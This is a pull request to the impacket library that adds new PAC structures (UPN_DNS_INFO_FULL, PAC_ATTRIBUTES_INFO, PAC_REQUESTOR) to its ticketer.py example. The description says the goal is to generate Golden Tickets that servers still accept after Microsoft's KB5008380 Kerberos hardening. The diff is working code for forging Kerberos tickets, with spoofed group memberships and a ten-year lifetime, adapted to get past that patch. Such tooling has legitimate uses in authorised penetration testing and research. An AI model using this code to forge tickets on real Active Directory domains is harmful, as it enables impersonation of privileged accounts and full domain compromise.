### PR TITLE
Ticketer extra-pac implementation (UPN_DNS_INFO, PAC_ATTRIBUTES_INFO, PAC_REQUESTOR)

### DIFF
--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -304,10 +304,10 @@ class TICKETER:
         pacInfos[PAC_ATTRIBUTES_INFO] = pacAttributes.getData()
 
     def createRequestorInfoPac(self, pacInfos):
-        pasRequestor = PAC_REQUESTOR()
-        pasRequestor['UserSid'].fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
+        pacRequestor = PAC_REQUESTOR()
+        pacRequestor['UserSid'].fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
 
-        pacInfos[PAC_REQUESTOR_INFO] = pasRequestor.getData()
+        pacInfos[PAC_REQUESTOR_INFO] = pacRequestor.getData()
 
     def createBasicTicket(self):
         if self.__options.request is True:

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -249,8 +249,8 @@ class TICKETER:
 
         if self.__options.extra_pac:
             self.createUpnDnsPac(pacInfos)
-            self.createAttributesInfoPac(pacInfos)
-            self.createRequestorInfoPac(pacInfos)
+        self.createAttributesInfoPac(pacInfos)
+        self.createRequestorInfoPac(pacInfos)
 
         return pacInfos
 

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -73,9 +73,11 @@ from impacket.krb5.crypto import Key, _enctype_table
 from impacket.krb5.crypto import _checksum_table, Enctype
 from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
     PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
-    VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO
+    VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO, UPN_DNS_INFO_FULL, PAC_REQUESTOR_INFO, PAC_UPN_DNS_INFO, PAC_ATTRIBUTES_INFO, PAC_REQUESTOR, \
+    PAC_ATTRIBUTE_INFO
 from impacket.krb5.types import KerberosTime, Principal
 from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
+from impacket.ldap.ldaptypes import LDAP_SID
 
 
 class TICKETER:
@@ -101,6 +103,14 @@ class TICKETER:
         t *= 10000000
         t += 116444736000000000
         return t
+    
+    @staticmethod
+    def getPadLength(data_length):
+        return ((data_length + 7) // 8 * 8) - data_length
+
+    @staticmethod
+    def getBlockLength(data_length):
+        return (data_length + 7) // 8 * 8
 
     def loadKeysFromKeytab(self, filename):
         keytab = Keytab.loadFile(filename)
@@ -164,10 +174,15 @@ class TICKETER:
         kerbdata['LogonCount'] = 500
         kerbdata['BadPasswordCount'] = 0
         kerbdata['UserId'] = int(self.__options.user_id)
-        kerbdata['PrimaryGroupId'] = 513
 
         # Our Golden Well-known groups! :)
         groups = self.__options.groups.split(',')
+        if len(groups) == 0:
+            # PrimaryGroupId must be set, default to 513 (Domain User)
+            kerbdata['PrimaryGroupId'] = 513
+        else:
+            # Using first group as primary group
+            kerbdata['PrimaryGroupId'] = int(groups[0])
         kerbdata['GroupCount'] = len(groups)
 
         for group in groups:
@@ -232,7 +247,67 @@ class TICKETER:
         clientInfo['NameLength'] = len(clientInfo['Name'])
         pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData()
 
+        if self.__options.extra_pac:
+            self.createUpnDnsPac(pacInfos)
+            self.createAttributesInfoPac(pacInfos)
+            self.createRequestorInfoPac(pacInfos)
+
         return pacInfos
+
+    def createUpnDnsPac(self, pacInfos):
+        upnDnsInfo = UPN_DNS_INFO_FULL()
+
+        PAC_pad = b'\x00' * self.getPadLength(len(upnDnsInfo))
+        upn_data = f"{self.__target.lower()}@{self.__domain.lower()}".encode("utf-16-le")
+        upnDnsInfo['UpnLength'] = len(upn_data)
+        upnDnsInfo['UpnOffset'] = len(upnDnsInfo) + len(PAC_pad)
+        total_len = upnDnsInfo['UpnOffset'] + upnDnsInfo['UpnLength']
+        pad = self.getPadLength(total_len)
+        upn_data += b'\x00' * pad
+
+        dns_name = self.__domain.upper().encode("utf-16-le")
+        upnDnsInfo['DnsDomainNameLength'] = len(dns_name)
+        upnDnsInfo['DnsDomainNameOffset'] = total_len + pad
+        total_len = upnDnsInfo['DnsDomainNameOffset'] + upnDnsInfo['DnsDomainNameLength']
+        pad = self.getPadLength(total_len)
+        dns_name += b'\x00' * pad
+
+        # Enable additional data mode (Sam + SID)
+        upnDnsInfo['Flags'] = 2
+
+        samName = self.__target.encode("utf-16-le")
+        upnDnsInfo['SamNameLength'] = len(samName)
+        upnDnsInfo['SamNameOffset'] = total_len + pad
+        total_len = upnDnsInfo['SamNameOffset'] + upnDnsInfo['SamNameLength']
+        pad = self.getPadLength(total_len)
+        samName += b'\x00' * pad
+
+        user_sid = LDAP_SID()
+        user_sid.fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
+        upnDnsInfo['SidLength'] = len(user_sid)
+        upnDnsInfo['SidOffset'] = total_len + pad
+        total_len = upnDnsInfo['SidOffset'] + upnDnsInfo['SidLength']
+        pad = self.getPadLength(total_len)
+        user_data = user_sid.getData() + b'\x00' * pad
+
+        # Post-PAC data
+        post_pac_data = upn_data + dns_name + samName + user_data
+        # Pac data building
+        pacInfos[PAC_UPN_DNS_INFO] = upnDnsInfo.getData() + PAC_pad + post_pac_data
+
+    @staticmethod
+    def createAttributesInfoPac(pacInfos):
+        pacAttributes = PAC_ATTRIBUTE_INFO()
+        pacAttributes["FlagsLength"] = 2
+        pacAttributes["Flags"] = 1
+
+        pacInfos[PAC_ATTRIBUTES_INFO] = pacAttributes.getData()
+
+    def createRequestorInfoPac(self, pacInfos):
+        pasRequestor = PAC_REQUESTOR()
+        pasRequestor['UserSid'].fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
+
+        pacInfos[PAC_REQUESTOR_INFO] = pasRequestor.getData()
 
     def createBasicTicket(self):
         if self.__options.request is True:
@@ -473,7 +548,7 @@ class TICKETER:
             if logging.getLogger().level == logging.DEBUG:
                 logging.debug('VALIDATION_INFO after making it gold')
                 validationInfo.dump()
-                print ('\n')
+                print('\n')
         else:
             raise Exception('PAC_LOGON_INFO not found! Aborting')
 
@@ -553,58 +628,120 @@ class TICKETER:
     def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
         logging.info('Signing/Encrypting final ticket')
 
+        # Basic PAC count
+        pac_count = 4
+
         # We changed everything we needed to make us special. Now let's repack and calculate checksums
         validationInfoBlob = pacInfos[PAC_LOGON_INFO]
-        validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob))
+        validationInfoAlignment = b'\x00' * self.getPadLength(len(validationInfoBlob))
 
         pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
-        pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob))
+        pacClientInfoAlignment = b'\x00' * self.getPadLength(len(pacClientInfoBlob))
+
+        pacUpnDnsInfoBlob = None
+        pacUpnDnsInfoAlignment = None
+        if PAC_UPN_DNS_INFO in pacInfos:
+            pac_count += 1
+            pacUpnDnsInfoBlob = pacInfos[PAC_UPN_DNS_INFO]
+            pacUpnDnsInfoAlignment = b'\x00' * self.getPadLength(len(pacUpnDnsInfoBlob))
+
+        pacAttributesInfoBlob = None
+        pacAttributesInfoAlignment = None
+        if PAC_ATTRIBUTES_INFO in pacInfos:
+            pac_count += 1
+            pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
+            pacAttributesInfoAlignment = b'\x00' * self.getPadLength(len(pacAttributesInfoBlob))
+
+        pacRequestorInfoBlob = None
+        pacRequestorInfoAlignment = None
+        if PAC_REQUESTOR_INFO in pacInfos:
+            pac_count += 1
+            pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
+            pacRequestorInfoAlignment = b'\x00' * self.getPadLength(len(pacRequestorInfoBlob))
 
         serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
         serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
-        serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob))
+        serverChecksumAlignment = b'\x00' * self.getPadLength(len(serverChecksumBlob))
 
         privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
         privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
-        privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob))
+        privSvrChecksumAlignment = b'\x00' * self.getPadLength(len(privSvrChecksumBlob))
 
         # The offset are set from the beginning of the PAC_TYPE
         # [MS-PAC] 2.4 PAC_INFO_BUFFER
-        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4
+        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * pac_count
 
         # Let's build the PAC_INFO_BUFFER for each one of the elements
         validationInfoIB = PAC_INFO_BUFFER()
         validationInfoIB['ulType'] = PAC_LOGON_INFO
         validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
         validationInfoIB['Offset'] = offsetData
-        offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8
+        offsetData = self.getBlockLength(offsetData + validationInfoIB['cbBufferSize'])
 
         pacClientInfoIB = PAC_INFO_BUFFER()
         pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
         pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
         pacClientInfoIB['Offset'] = offsetData
-        offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8
+        offsetData = self.getBlockLength(offsetData + pacClientInfoIB['cbBufferSize'])
+
+        pacUpnDnsInfoIB = None
+        if pacUpnDnsInfoBlob is not None:
+            pacUpnDnsInfoIB = PAC_INFO_BUFFER()
+            pacUpnDnsInfoIB['ulType'] = PAC_UPN_DNS_INFO
+            pacUpnDnsInfoIB['cbBufferSize'] = len(pacUpnDnsInfoBlob)
+            pacUpnDnsInfoIB['Offset'] = offsetData
+            offsetData = self.getBlockLength(offsetData + pacUpnDnsInfoIB['cbBufferSize'])
+
+        pacAttributesInfoIB = None
+        if pacAttributesInfoBlob is not None:
+            pacAttributesInfoIB = PAC_INFO_BUFFER()
+            pacAttributesInfoIB['ulType'] = PAC_ATTRIBUTES_INFO
+            pacAttributesInfoIB['cbBufferSize'] = len(pacAttributesInfoBlob)
+            pacAttributesInfoIB['Offset'] = offsetData
+            offsetData = self.getBlockLength(offsetData + pacAttributesInfoIB['cbBufferSize'])
+
+        pacRequestorInfoIB = None
+        if pacRequestorInfoBlob is not None:
+            pacRequestorInfoIB = PAC_INFO_BUFFER()
+            pacRequestorInfoIB['ulType'] = PAC_REQUESTOR_INFO
+            pacRequestorInfoIB['cbBufferSize'] = len(pacRequestorInfoBlob)
+            pacRequestorInfoIB['Offset'] = offsetData
+            offsetData = self.getBlockLength(offsetData + pacRequestorInfoIB['cbBufferSize'])
 
         serverChecksumIB = PAC_INFO_BUFFER()
         serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
         serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
         serverChecksumIB['Offset'] = offsetData
-        offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8
+        offsetData = self.getBlockLength(offsetData + serverChecksumIB['cbBufferSize'])
 
         privSvrChecksumIB = PAC_INFO_BUFFER()
         privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
         privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
         privSvrChecksumIB['Offset'] = offsetData
-        # offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8
+        # offsetData = self.getBlockLength(offsetData+privSvrChecksumIB['cbBufferSize'])
 
         # Building the PAC_TYPE as specified in [MS-PAC]
-        buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \
-            privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \
-            pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
+        buffers = validationInfoIB.getData() + pacClientInfoIB.getData()
+        if pacUpnDnsInfoIB is not None:
+            buffers += pacUpnDnsInfoIB.getData()
+        if pacAttributesInfoIB is not None:
+            buffers += pacAttributesInfoIB.getData()
+        if pacRequestorInfoIB is not None:
+            buffers += pacRequestorInfoIB.getData()
+
+        buffers += serverChecksumIB.getData() + privSvrChecksumIB.getData() + validationInfoBlob + \
+            validationInfoAlignment + pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
+        if pacUpnDnsInfoIB is not None:
+            buffers += pacUpnDnsInfoBlob + pacUpnDnsInfoAlignment
+        if pacAttributesInfoIB is not None:
+            buffers += pacAttributesInfoBlob + pacAttributesInfoAlignment
+        if pacRequestorInfoIB is not None:
+            buffers += pacRequestorInfoBlob + pacRequestorInfoAlignment
+
         buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
 
         pacType = PACTYPE()
-        pacType['cBuffers'] = 4
+        pacType['cBuffers'] = pac_count
         pacType['Version'] = 0
         pacType['Buffers'] = buffers + buffersTail
 
@@ -649,7 +786,7 @@ class TICKETER:
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('Customized EncTicketPart')
             print(encTicketPart.prettyPrint())
-            print ('\n')
+            print('\n')
 
         encodedEncTicketPart = encoder.encode(encTicketPart)
 
@@ -701,7 +838,7 @@ class TICKETER:
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('Final Golden Ticket')
             print(kdcRep.prettyPrint())
-            print ('\n')
+            print('\n')
 
         return encoder.encode(kdcRep), cipher, sessionKey
 
@@ -745,6 +882,7 @@ if __name__ == '__main__':
     parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be '
                                                                           'created for (default = 500)')
     parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC')
+    parser.add_argument('-extra-pac', action='store_true', help='Populate your ticket with extra PAC (UPN_DNS, ATTRIBUTES and REQUESTOR)')
     parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires '
                                                                             '(default = 365*10)')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -882,7 +882,7 @@ if __name__ == '__main__':
     parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be '
                                                                           'created for (default = 500)')
     parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC')
-    parser.add_argument('-extra-pac', action='store_true', help='Populate your ticket with extra PAC (UPN_DNS and ATTRIBUTES)')
+    parser.add_argument('-extra-pac', action='store_true', help='Populate your ticket with extra PAC (UPN_DNS)')
     parser.add_argument('-duration', action="store", default = '87600', help='Amount of hours till the ticket expires '
                                                                              '(default = 24*365*10)')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')

--- a/impacket/krb5/pac.py
+++ b/impacket/krb5/pac.py
@@ -12,10 +12,11 @@
 # Author:
 #   Alberto Solino (@agsolino)
 #
-from impacket.dcerpc.v5.dtypes import ULONG, RPC_UNICODE_STRING, FILETIME, PRPC_SID, USHORT
+from impacket.dcerpc.v5.dtypes import ULONG, RPC_UNICODE_STRING, FILETIME, PRPC_SID, USHORT, RPC_SID
 from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantArray, NDRPOINTER
 from impacket.dcerpc.v5.nrpc import USER_SESSION_KEY, CHAR_FIXED_8_ARRAY, PUCHAR_ARRAY, PRPC_UNICODE_STRING_ARRAY
 from impacket.dcerpc.v5.rpcrt import TypeSerialization1
+from impacket.ldap.ldaptypes import LDAP_SID
 from impacket.structure import Structure
 
 ################################################################################
@@ -30,6 +31,8 @@ PAC_PRIVSVR_CHECKSUM = 7
 PAC_CLIENT_INFO_TYPE = 10
 PAC_DELEGATION_INFO  = 11
 PAC_UPN_DNS_INFO     = 12
+PAC_ATTRIBUTES_INFO  = 17
+PAC_REQUESTOR_INFO   = 18
 
 ################################################################################
 # STRUCTURES
@@ -203,7 +206,22 @@ class UPN_DNS_INFO(Structure):
         ('UpnOffset', '<H=0'),
         ('DnsDomainNameLength', '<H=0'),
         ('DnsDomainNameOffset', '<H=0'),
+        ('Flags', '<L=0')
+    )
+
+# 2.10 UPN_DNS_INFO
+# Full struct including additional fields (use this structure when S Flag is set)
+class UPN_DNS_INFO_FULL(Structure):
+    structure = (
+        ('UpnLength', '<H=0'),
+        ('UpnOffset', '<H=0'),
+        ('DnsDomainNameLength', '<H=0'),
+        ('DnsDomainNameOffset', '<H=0'),
         ('Flags', '<L=0'),
+        ('SamNameLength', '<H=0'),
+        ('SamNameOffset', '<H=0'),
+        ('SidLength', '<H=0'),
+        ('SidOffset', '<H=0'),
     )
 
 # 2.11 PAC_CLIENT_CLAIMS_INFO
@@ -236,3 +254,38 @@ class VALIDATION_INFO(TypeSerialization1):
     structure = (
         ('Data', PKERB_VALIDATION_INFO),
     )
+
+# 2.14 PAC_ATTRIBUTES_INFO
+class PAC_ATTRIBUTE_INFO(NDRSTRUCT):
+    structure = (
+        ('FlagsLength', ULONG),
+        ('Flags', ULONG),
+    )
+
+# 2.15 PAC_REQUESTOR
+# It should be RPC_SID (with NDRSTRUCT sub-class) but the impacket implementation is malfunctioning: https://github.com/SecureAuthCorp/impacket/issues/1386
+#class PAC_REQUESTOR(NDRSTRUCT):
+#    structure = (
+#        ('UserSid', RPC_SID),
+#    )
+# In the meantime, using LDAP_SID with minimal custom implementation
+class PAC_REQUESTOR:
+
+    def __init__(self, data=None):
+        self.fields = {'UserSid': LDAP_SID(data)}
+
+    # For other method not implemented, directly call 'UserSid' field
+    def __getitem__(self, key):
+        return self.fields[key]
+
+    def __setitem__(self, key, value):
+        self.fields[key] = value
+
+    def getData(self):
+        return self.fields['UserSid'].getData()
+
+    def __str__(self):
+        return self.getData()
+
+    def __len__(self):
+        return len(self.getData())


### PR DESCRIPTION
## Introduction
Following the new release of Windows reinforcement policy (e.g. https://support.microsoft.com/en-gb/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) here is my PR to implement these new PAC in impacket and in ticketer to generate new GoldenTicket that will be accepted by the servers (e.g. https://github.com/SecureAuthCorp/impacket/issues/1390).

## To review
- I had problems implementing the PAC_REQUESTOR because of this problem: https://github.com/SecureAuthCorp/impacket/issues/1386. The structure will have to be updated following the correction of this bug to standardize the PAC structures (code already available in comments).
- In order to keep the UPN_DNS_INFO structure at the right size (when the S flag is not set) I created a second UPN_DNS_INFO structure which includes the extra fields (for when the S flag is set). In this configuration you have to use the right structure depending on the flag configuration, or use the 'simple' structure first and then use the FULL one if needed.
- It is possible in the future that the PAC ATTRIBUTES and / or REQUESTOR become mandatory and in this case it would be useful to think about executing the functions of generation of these PAC by default even without the `-extra-pac` argument.

## Summary
To summarize the additions to this RP:
- Completion of the PAC implementation UPN_DNS_INFO (to UPN_DNS_INFO_FULL) in impacket (When the S flag is set, the SamName and Sid is also populated)
- Added a method to generate a compliant UPN_DNS_INFO_FULL in ticketer
- Implementation of PAC_ATTRIBUTES_INFO
- Add a method to generate a compliant PAC_ATTRIBUTES_INFO in ticketer
- Implementation of PAC_REQUESTOR
- Add a method to generate a compliant PAC_REQUESTOR in ticketer
- **Added an `-extra-pac` option** to make these PACs optional while waiting for more tests (don't forget to specify it for testing new PACs)
- Modification of the hardcoded PrimaryGroupId, now the first group of the list will be used as PrimaryGroupId (with a default in 513)
- Dynamic number of PAC in PACTYPE
- Generalization of padding calculation methods (less mistake)

## Documentations
### Overview
https://blog.netwrix.com/2022/01/10/pacrequestorenforcement-and-kerberos-authentication/
https://support.microsoft.com/en-gb/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041
### Missing (or incomplete) PAC
2.10 UPN_DNS_INFO : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/1c0d6e11-6443-4846-b744-f9f810a504eb
2.14 PAC_ATTRIBUTES_INFO : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/1c7aeadb-8ca4-4050-ae98-0e9834bdd81d
2.15 PAC_REQUESTOR : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/c34adc61-80e1-4920-8923-22ef5054c4b2

